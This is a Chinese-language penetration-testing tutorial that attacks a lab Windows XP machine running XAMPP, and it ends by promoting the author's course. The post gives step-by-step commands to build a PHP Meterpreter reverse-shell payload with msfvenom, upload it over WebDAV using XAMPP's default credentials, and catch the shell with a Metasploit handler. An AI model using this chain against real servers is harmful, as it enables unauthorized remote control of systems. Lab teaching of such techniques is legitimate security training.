用於網絡安全滲透測試,禁止用於不當目的!
測試環境
之前我們搭建的測試靶機xp,已經內置了XAMPP web服務器組件。
在這個XAMPP組件中,大家可以看到安裝有phpMyAdmin軟件,它是一個網頁版的數據庫管理平臺,顯然我們可以看到xp安裝了apache服務,支持web形式的訪問和數據支持,另外還有php組件,說明只要通過任何瀏覽器訪問xp的web服務頁面地址路徑(通常指定一個php後綴的文件),就能打開php的文件。
![使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell](http://p2.ttnews.xyz/loading.gif)
![使用WebDav默認口令上傳php遠控,不用雙擊運行也能拿到shell](http://p2.ttnews.xyz/loading.gif)
攻擊思路:
既然xp安裝了xampp,等同於可以運行php後綴的文件,我們只要通過一些技術手段上傳一個php載荷小馬即可,這種php載荷是不用在目標靶機進行運行的,我們只需要在本地kali進行遠程觸發即可(因為php或者jsp類型的文件本來就是放在web服務器根目錄中讓他人通過瀏覽器進行訪問讀取的!懂?)
注意:xp靶機的xampp必須開啟!
實戰測試
- 生成windows平臺php遠控
kali終端下輸入:
<code>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.251 LPORT=8888 -f raw > xiaobai.php/<code>
- 發送遠控
這裡我們需要上傳xiaobai.php小馬到我們的xp服務器(xampp)中。
那如何實現上傳呢?
其實在xp上安裝的這個xampp存在WebDAV服務器程序,而且這個版本xampp的WebDAV口令都是默認的(一般不會更改)(一般web掃描軟件並不會發現)
WebDAV是一個分佈式文件管理服務器,用於上下傳文件使用的。我們可以使用kali自帶的客戶端Cadaver程序來進行連接。
Kali終端下輸入:
<code>cadaver/<code>
默認的用戶名是:wampp,密碼是xampp!
如圖:你發現已經成功進行了連接,而且還能使用ls命令查看當前webdav目錄下的文件,甚至可以刪除、上傳、下載!這就是我們的一個突破口!
在webdav的當前終端下輸入:
<code>?/<code>
即可顯示所有支持的命令!我們這裡選擇put命令,上傳kali的php小馬上去!
輸入:
<code>put xiaobai.php/<code>
你會發現已經成功上傳我們的php載荷到xp的webdav服務器中了,你可以使用ls再次查看!
- 設置msf監聽
Kali終端下輸入:
<code>msfconsole,啟動metasploit/<code>
設置相關偵聽模塊和載荷以及參數
<code>use multi/handler
set payload php/meterpreter/reverse_tcp
set LHOSTS 192.168.31.251
set LPORT 8888
run/<code>
提示:這裡的meterpreter會話有時候不一定會建立成功,但是這種攻擊方法,你一定要會,在web滲透中,這就是常用的伎倆。
關注小白嘿客,學習完整的web滲透,可以點擊 進入我的嘿客專欄獲得永久學習哦!
閱讀更多 小白嘿客 的文章